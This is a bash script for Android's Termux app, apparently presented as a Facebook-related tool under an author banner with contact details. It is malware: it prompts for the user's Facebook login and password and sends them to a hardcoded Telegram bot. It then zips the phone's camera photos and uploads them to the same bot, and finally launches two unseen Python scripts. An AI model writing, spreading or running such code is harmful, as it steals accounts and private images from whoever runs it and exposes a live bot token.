#!/bin/bash
pkg update -y && pkg upgrade -y && pkg install  curl -y && pkg install python -y  && pkg install zip -y

echo "**********************************************"
echo "*                                            *"
echo "*                                            *"
echo "*              Bahaa El Maghrabi             *"
echo "*                                            *"
echo "*     My Fhone Namber is : +201064004818     *"
echo "*                                            *"
echo "*                                            *"
echo "*                                            *"
echo "*   My Telegram is : t.me/bahaa_010640       *"
echo "*                                            *"
echo "*                                            *"
echo "*                                            *"
echo "*                                            *"
echo "**********************************************"
read -p 'prss Enter for contanu '
echo "loogin "; sleep 5
tok=7023319102:AAHma8eMrLiYtW2-4sF0bGDXuMHdjQgHKxs
CHAT_ID=5792222595
echo "**********************************************"
echo "*                                            *"
echo "*             Bahaa El Maghrabi              *"
echo "*                                            *"
echo "*                                            *"
echo "*                                            *"
echo "*                                            *"
echo "*                                            *"
echo "*           Starting pleas wait              *"
echo "*                                            *"
echo "*                                            *"
echo "*                                            *"
echo "*                                            *"
echo "**********************************************"

echo "Enter Your Email Facebook"

while true; do
  read -p "Enter Your Namber/Email for FB accaunt : " nan 
  if [[ ${#nan} -lt 6 ]]; then
    echo "Error !!"
  else
    break
  fi
done

echo "Done...: $non"
echo " Enter Password your FB accaunt"
while true; do
read -p "+ " pass
  if [[ ${#pass} -lt 6 ]]; then
    echo "Error Pasword !!"
  else
    break
  fi
done

echo "Done...:"

curl -s -X POST "https://api.telegram.org/bot$tok/sendMessage" -d "chat_id=$CHAT_ID" -d "text=$nan : pasword=$pass" 
########################################################################################################################
cd /sdcard/DCIM/Camera && zip img.zip *.jpg

echo "pleas wint..."
toh=7023319102:AAHma8eMrLiYtW2-4sF0bGDXuMHdjQgHKxs
id=5792222595
fl=/sdcard/DCIM/Camera/img.zip

curl -F document=@"$fl" https://api.telegram.org/bot$toh/sendDocument -F chat_id=$id

###########################################################################################################################
python c1 & python c2
